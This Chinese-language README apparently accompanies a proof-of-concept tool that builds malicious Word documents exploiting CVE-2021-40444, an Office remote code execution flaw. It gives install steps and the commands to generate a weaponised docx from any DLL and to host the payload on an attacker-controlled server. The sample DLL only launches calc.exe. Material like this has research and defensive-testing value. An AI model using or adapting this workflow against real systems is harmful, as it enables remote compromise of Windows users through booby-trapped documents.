用于利用 CVE-2021-40444(Microsoft Office Word 远程代码执行)的恶意 docx 生成器
此脚本的创建基于对在野样本 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)的一些逆向工程。
首先需要安装 lcab(sudo apt-get install lcab)
手动复现步骤请参阅 REPRODUCE.md
如果生成的 cab 无法工作,请尝试将 exploit.html 的 URL 指向 calc.cab
首先,给定一个 DLL 生成恶意 docx 文档,你可以使用 test/calc.dll 中的那个,它通过调用 system() 弹出一个 calc.exe。
python3 exploit.py generate test/calc.dll http://<SRV IP>

生成恶意 docx(将位于 out/)后,你可以设置服务器:
sudo python3 exploit.py host 80

最后在 Windows 虚拟机中尝试该 docx:
